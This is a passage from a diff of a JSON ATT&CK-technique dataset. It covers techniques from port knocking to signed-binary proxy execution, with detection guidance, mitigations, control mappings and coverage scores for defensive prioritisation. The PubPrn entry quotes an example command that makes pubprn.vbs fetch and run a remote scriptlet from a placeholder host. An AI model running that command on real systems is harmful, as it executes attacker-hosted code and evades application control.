+ "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1205.001", + "name": "Traffic Signaling: Port Knocking", + "url": "https://attack.mitre.org/techniques/T1205/001", + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "cumulative_score": 0.31243809523809524, + "adjusted_score": 0.31243809523809524, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.2,4.4,7.7,13.4" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-15", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1207", + "name": "Rogue Domain Controller", + "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)", + "url": "https://attack.mitre.org/techniques/T1207", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)\n\nLeverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)\n\nBaseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)\n\nInvestigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Active Directory: Active Directory Object Creation", + "Active Directory: Active Directory Object Modification", + "Network Traffic: Network Traffic Content", + "User Account: User Account Authentication" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.14624761904761904, + "adjusted_score": 0.14624761904761904, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1210", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.", + "url": "https://attack.mitre.org/techniques/T1210", + "tactics": [ + "Lateral Movement" + ], + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + } + ], + "cumulative_score": 1.0204095238095239, + "adjusted_score": 1.0204095238095239, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "2.3,2.5,3.12,4.1,4.4,4.7,4.8,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,7.6,10.5,12.2,12.8,16.13,16.8,18.1,18.2,18.3,18.5,16.10" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-2", + "CA-7", + "CA-8", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-8", + "RA-10", + "RA-5", + "SC-18", + "SC-2", + "SC-26", + "SC-29", + "SC-3", + "SC-30", + "SC-35", + "SC-39", + "SC-46", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-5", + "SI-7" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1211", + "name": "Exploitation for Defense Evasion", + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.", + "url": "https://attack.mitre.org/techniques/T1211", + "tactics": [ + "Defense Evasion" + ], + "detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.6166729827028572, + "adjusted_score": 0.6166729827028572, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "7.1,7.2,7.3,7.4,7.5,10.5,18.3,18.5" + ], + "nist_controls": [ + "AC-4", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-6", + "CM-8", + "RA-10", + "RA-5", + "SC-18", + "SC-2", + "SC-26", + "SC-29", + "SC-3", + "SC-30", + "SC-35", + "SC-39", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-5", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1212", + "name": "Exploitation for Credential Access", + "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", + "url": "https://attack.mitre.org/techniques/T1212", + "tactics": [ + "Credential Access" + ], + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "cumulative_score": 0.6381714285714286, + "adjusted_score": 0.6381714285714286, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "7.1,7.2,7.3,7.4,7.5,10.5,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-4", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-6", + "CM-8", + "RA-10", + "RA-5", + "SC-18", + "SC-2", + "SC-26", + "SC-29", + "SC-3", + "SC-30", + "SC-35", + "SC-39", + "SC-7", + "SI-2", + "SI-3", + "SI-4", + "SI-5", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1213", + "name": "Data from Information Repositories", + "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.", + "url": "https://attack.mitre.org/techniques/T1213", + "tactics": [ + "Collection" + ], + "detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", + "platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1213.001", + "name": "Data from Information Repositories: Confluence", + "url": "https://attack.mitre.org/techniques/T1213/001", + "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1213.002", + "name": "Data from Information Repositories: Sharepoint", + "url": "https://attack.mitre.org/techniques/T1213/002", + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1213.003", + "name": "Data from Information Repositories: Code Repositories", + "url": "https://attack.mitre.org/techniques/T1213/003", + "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)", + "detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 0.5704761904761905, + "adjusted_score": 0.5704761904761905, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "3.1,3.2,3.3,4.7,5.3,6.1,6.2,6.8,14.1,14.4,14.5,16.1,16.9,18.3,18.5" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-2", + "AC-21", + "AC-23", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-2", + "CM-3", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-4", + "IA-8", + "RA-5", + "SC-28", + "SI-4", + "SI-7" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1216", + "name": "Signed Script Proxy Execution", + "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)", + "url": "https://attack.mitre.org/techniques/T1216", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1216.001", + "name": "Signed Script Proxy Execution: PubPrn", + "url": "https://attack.mitre.org/techniques/T1216/001", + "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).", + "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "cumulative_score": 0.30959031359238093, + "adjusted_score": 0.30959031359238093, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "2.7" + ], + "nist_controls": [ + "CM-2", + "CM-6", + "CM-7", + "SI-10", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1217", + "name": "Browser Bookmark Discovery", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.", + "url": "https://attack.mitre.org/techniques/T1217", + "tactics": [ + "Discovery" + ], + "detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.15954285714285715, + "adjusted_score": 0.15954285714285715, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1218", + "name": "Signed Binary Proxy Execution", + "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.", + "url": "https://attack.mitre.org/techniques/T1218", + "tactics": [ + "Defense Evasion" + ], + "detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "Module: Module Load", + "Network Traffic: Network Connection Creation", + "Process: OS API Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1218.001", + "name": "Signed Binary Proxy Execution: Compiled HTML File", + "url": "https://attack.mitre.org/techniques/T1218/001", + "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)", + "detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros 